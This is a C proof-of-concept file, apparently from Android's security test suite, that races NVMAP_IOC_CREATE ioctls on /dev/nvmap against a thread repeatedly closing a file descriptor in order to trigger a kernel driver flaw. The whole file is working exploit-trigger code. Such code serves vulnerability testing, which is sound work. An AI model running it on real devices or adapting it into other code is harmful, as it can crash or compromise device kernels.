1 /*
2 * Copyright (C) 2017 The Android Open Source Project
3 *
4 * Licensed under the Apache License, Version 2.0 (the "License");
5 * you may not use this file except in compliance with the License.
6 * You may obtain a copy of the License at
7 *
8 * http://www.apache.org/licenses/LICENSE-2.0
9 *
10 * Unless required by applicable law or agreed to in writing, software
11 * distributed under the License is distributed on an "AS IS" BASIS,
12 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 * See the License for the specific language governing permissions and
14 * limitations under the License.
15 */
16 #define _GNU_SOURCE
17 #include <stdlib.h>
18 #include <errno.h>
19 #include <unistd.h>
20 #include <stdio.h>
21 #include <dirent.h>
22 #include <string.h>
23 #include <sys/stat.h>
24 #include <sys/ioctl.h>
25 #include <stdio.h>
26 #include <string.h>
27 #include <dlfcn.h>
28 #include <sys/time.h>
29 #include <sys/mman.h>
30 #include <sys/syscall.h>
31 #include <sys/resource.h>
32 #include <fcntl.h>
33 #include <pthread.h>
34 #include <unistd.h>
35 #include <sched.h>
36
37 #define NVMAP_HEAP_CARVEOUT_IRAM (1ul<<29)
38 #define NVMAP_HEAP_CARVEOUT_VPR (1ul<<28)
39 #define NVMAP_HEAP_CARVEOUT_TSEC (1ul<<27)
40 #define NVMAP_HEAP_CARVEOUT_GENERIC (1ul<<0)
41
42 #define NVMAP_HEAP_CARVEOUT_MASK (NVMAP_HEAP_IOVMM - 1)
43
44 /* allocation flags */
45 #define NVMAP_HANDLE_UNCACHEABLE (0x0ul << 0)
46 #define NVMAP_HANDLE_WRITE_COMBINE (0x1ul << 0)
47 #define NVMAP_HANDLE_INNER_CACHEABLE (0x2ul << 0)
48 #define NVMAP_HANDLE_CACHEABLE (0x3ul << 0)
49 #define NVMAP_HANDLE_CACHE_FLAG (0x3ul << 0)
50
51 #define NVMAP_HANDLE_SECURE (0x1ul << 2)
52 #define NVMAP_HANDLE_KIND_SPECIFIED (0x1ul << 3)
53 #define NVMAP_HANDLE_COMPR_SPECIFIED (0x1ul << 4)
54 #define NVMAP_HANDLE_ZEROED_PAGES (0x1ul << 5)
55 #define NVMAP_HANDLE_PHYS_CONTIG (0x1ul << 6)
56 #define NVMAP_HANDLE_CACHE_SYNC (0x1ul << 7)
57
58 struct nvmap_handle_param {
59 __u32 handle; /* nvmap handle */
60 __u32 param; /* size/align/base/heap etc. */
61 unsigned long result; /* returns requested info*/
62 };
63
64 struct nvmap_create_handle {
65 union {
66 __u32 id; /* FromId */
67 __u32 size; /* CreateHandle */
68 __s32 fd; /* DmaBufFd or FromFd */
69 };
70 __u32 handle; /* returns nvmap handle */
71 };
72
73 struct nvmap_alloc_handle {
74 __u32 handle; /* nvmap handle */
75 __u32 heap_mask; /* heaps to allocate from */
76 __u32 flags; /* wb/wc/uc/iwb etc. */
77 __u32 align; /* min alignment necessary */
78 };
79
80 #define NVMAP_IOC_MAGIC 'N'
81 #define NVMAP_IOC_CREATE _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
82 #define NVMAP_IOC_PARAM _IOWR(NVMAP_IOC_MAGIC, 8, struct nvmap_handle_param)
83 #define NVMAP_IOC_GET_ID _IOWR(NVMAP_IOC_MAGIC, 13, struct nvmap_create_handle)
84 #define NVMAP_IOC_GET_FD _IOWR(NVMAP_IOC_MAGIC, 15, struct nvmap_create_handle)
85 #define NVMAP_IOC_FREE _IO(NVMAP_IOC_MAGIC, 4)
86 #define NVMAP_IOC_ALLOC _IOW(NVMAP_IOC_MAGIC, 3, struct nvmap_alloc_handle)
87 #define NVMAP_IOC_FROM_FD _IOWR(NVMAP_IOC_MAGIC, 16, struct nvmap_create_handle)
88 int g_fd = -1;
89 static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
90 static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
91 struct nvmap_create_handle* g_allocation = NULL;
92 struct nvmap_create_handle g_allocation_dup;
93
open_driver()94 int open_driver() {
95 char* dev_path = "/dev/nvmap";
96 g_fd = open(dev_path, O_RDWR);
97 if (g_fd < 0) {
98 printf("[*] open file(%s) failed, errno=%d\n", dev_path, errno);
99 } else {
100 printf("[*] open file(%s) succ!\n", dev_path);
101 }
102 return g_fd;
103 }
104
trigger_nvmap_create()105 void trigger_nvmap_create() {
106 ioctl(g_fd, NVMAP_IOC_CREATE, g_allocation);
107 }
108
trigger_nvmap_create_dup(int fd)109 void trigger_nvmap_create_dup(int fd) {
110 g_allocation_dup.fd = fd;
111 ioctl(g_fd, NVMAP_IOC_FROM_FD, &g_allocation_dup);
112 }
113
trigger_nvmap_alloc()114 void trigger_nvmap_alloc() {
115 struct nvmap_alloc_handle alloc = {0};
116 alloc.align = 0x1000;
117 alloc.heap_mask = NVMAP_HEAP_CARVEOUT_GENERIC;
118 alloc.flags = NVMAP_HANDLE_ZEROED_PAGES;
119 alloc.handle = g_allocation->handle;
120 ioctl(g_fd, NVMAP_IOC_ALLOC, &alloc);
121 }
122
trigger_nvmap_free(int fd)123 void trigger_nvmap_free(int fd) {
124 ioctl(g_fd, NVMAP_IOC_FREE, fd);
125 }
126
setup_privi_and_affinity(int privi,unsigned long cpu_mask)127 void setup_privi_and_affinity(int privi, unsigned long cpu_mask) {
128 setpriority(PRIO_PROCESS, gettid(), privi);
129
130 /* bind process to a CPU*/
131 if (sched_setaffinity(gettid(), sizeof(cpu_mask), &cpu_mask) < 0) {
132 }
133 }
134
prepare_data()135 void prepare_data() {
136 void* data = (void *) memalign(0x1000, 4 * 0x1000);
137 //void* data = malloc(0x10000);
138 printf("[*] data = %p\n", data);
139 g_allocation = (struct nvmap_create_handle*)data;
140 g_allocation->size = 1024;
141 g_allocation->handle = -1;
142 mprotect(data, 0x1000, PROT_READ);
143 printf("[*] mprotect, error = %d\n", errno);
144 }
145
race_thread(void * arg)146 void* race_thread(void* arg) {
147 setup_privi_and_affinity(-10, 2);
148
149 pthread_mutex_lock(&mutex);
150 pthread_cond_wait(&cond, &mutex);
151 pthread_mutex_unlock(&mutex);
152
153 while (1)
154 close(1024);
155 }
156
main(int argc,char ** argv)157 int main(int argc, char**argv) {
158
159 setup_privi_and_affinity(-10, 1);
160
161 if (open_driver() < 0) {
162 return -1;
163 }
164 prepare_data();
165
166 pthread_t tid;
167 pthread_create(&tid, NULL, race_thread, NULL);
168 usleep(100 * 1000);
169
170 pthread_cond_signal(&cond);
171 usleep(20);
172 while (1) {
173 trigger_nvmap_create();
174 }
175 return 0;
176 }
177